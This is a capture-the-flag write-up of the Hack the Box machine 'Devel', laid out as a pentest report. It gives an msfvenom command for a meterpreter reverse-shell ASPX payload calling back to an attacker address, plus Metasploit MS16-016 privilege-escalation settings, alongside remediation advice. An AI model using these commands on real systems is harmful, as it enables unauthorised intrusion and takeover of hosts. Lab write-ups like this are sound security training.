HTB Devel
HTB Devel is an easy level Hack the Box challenge.
Summary
Devel is an IIS server that has multiple vulnerabilities, which were able to be exploited to the ends of gaining local administrative privilges.
The box presents a major initial access vulnerability in having an exposed FTP server that permits anonymous logon with write permissions into the IIS wwwroot. This allows an attacker to gain initial access by uploading a malicious aspx script.
Once initial access is gained, the system is internally vulnerable to CVE-2016-0051/MS16-016, which allows for local privilege escalation to NT AUTHORITY\SYSTEM.
Service Enumeration
Nmap Scan results
└─$ sudo nmap -sC -sV -T 4 -vvv -Pn 10.129.127.165
map scan report for 10.129.127.165
Host is up, received user-set (0.051s latency).
Scanned at 2023-08-25 14:37:05 UTC for 18s
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
port | protocol | version | notes |
---|---|---|---|
TCP 21 | FTP | MS FTPd | Anon logon permitted; looks like it contains IIS stuff. |
TCP 80 | HTTP | MS IIS 7.5 |
An initial nmap scan was run, revealing an FTP server that permitted anonymous logon. Upon discovery, logon was successfully attempted. Write permissions were successfully tested for by uploading a text document containing the string "it worked" into the root directory of the server.
Noticing that the files in the directory appeared to be IIS default files, an attempt was successfully made to view the file through the IIS web interface. This proved that the directory presented by the FTP server was indeed the IIS wwwroot.
From here, a malicious ASPX script was created with MSFvenom, uploaded to the server via FTP and accessed, resulting in a user level compromise.
Vulnerability Explanation
By leaving the FTP server open to anonymous logon and write, an attacker is able to arbitrarily upload files, including malicious files that can then be executed by the web server.
Vulnerability Fix
Several factors can be altered in order to correct this issue:
- Please consider securing FTP with a strong password and disabling any sort of anonymous logon.
- FTP is an unencrypted protocol. Please consider making it only available to the local network, and then using a VPN in order to make it available to remote users.
- Additionally, please consider implementing an EDR system in order to halt the execution of common malicious shellcode such as Meterpreter.
- Also consider utilizing an IDS/IPS in order to halt signatured malicious network traffic as is generated by tools like Meterpreter.
Severity
Internally assessed CVSS 3.0: 9.5 critical.
Proof Of Concept Code
Command line used to generate initial access shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.141 LPORT=4444 -f aspx >reverse.aspx
Proof Screenshot
Proof Text
01ff1ec5baf99bbf2e5c5c6e30da64d6
Privilege Escalation
Once an initial access shell was acheived, the meterpreter session was backgrounded and Metasploit's local exploit suggester was utilized in order to discover a potential privilege escalation vector.
After trial and error with the returned results, exploit/windows/local/ms16_016_webdav
was utilized successfully to return a reverse shell session as NT AUTHORITY\SYSTEM.
Vulnerability Explanation
CVE-2016-0051/MS16-016
Per NIST:
The WebDAV client in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application, aka "WebDAV Elevation of Privilege Vulnerability."
Vulnerability Fix
Several remedies exist for this vulnerability:
- Please consider updating Windows. This vulnerability exists only in Windows 7/Server 2008 and lower. Modern Windows 10 and 11 should not be vulnerable.
- If this host must use Windows 7/Server 2008, please consider applying the security update referenced in this article from Microsoft.
Severity
Internally assessed CVSS 3.0: 8.2 high.
Official per NIST: 7.2 high. Reference
Proof Of Concept Code
Exploitation was accomplished with unmodified public exploit. Source can be reviewed here.
MSF Module Config:
Module options (exploit/windows/local/ms16_016_webdav):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 3 yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.141 yes The listen address (an interface may be specified)
LPORT 4443 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 SP1
Proof Screenshot
Proof Text
fe04337ca7002e7ff45c3f33222bbb50